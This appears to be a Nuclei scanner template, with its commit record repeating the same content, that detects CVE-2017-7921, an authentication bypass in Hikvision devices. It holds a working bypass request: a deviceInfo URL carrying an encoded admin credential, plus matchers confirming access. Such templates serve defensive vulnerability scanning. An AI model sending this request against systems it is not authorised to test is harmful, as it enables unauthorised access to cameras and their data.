nuclei-templates/cves/2017/CVE-2017-7921.yaml

id: CVE-2017-7921
info:
  name: Hikvision Authentication Bypass
  author: princechaddha
  severity: high
  reference: https://www.cvedetails.com/cve/CVE-2017-7921/
  tags: cve,cve2017,auth-bypass

requests:
  - method: GET
    path:
      - "{{BaseURL}}/system/deviceInfo?auth=YWRtaW46MTEK"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<firmwareVersion>"
        part: body

      - type: word
        words:
          - "application/xml"
        part: header
Create CVE-2017-7921.yaml 2021-04-07 17:00:37 +00:00			`id: CVE-2017-7921`
			`info:`
			`name: Hikvision Authentication Bypass`
			`author: princechaddha`
			`severity: high`
			`reference: https://www.cvedetails.com/cve/CVE-2017-7921/`
			`tags: cve,cve2017,auth-bypass`

			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/system/deviceInfo?auth=YWRtaW46MTEK"`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- "<firmwareVersion>"`
			`part: body`

			`- type: word`
			`words:`
			`- "application/xml"`
			`part: header`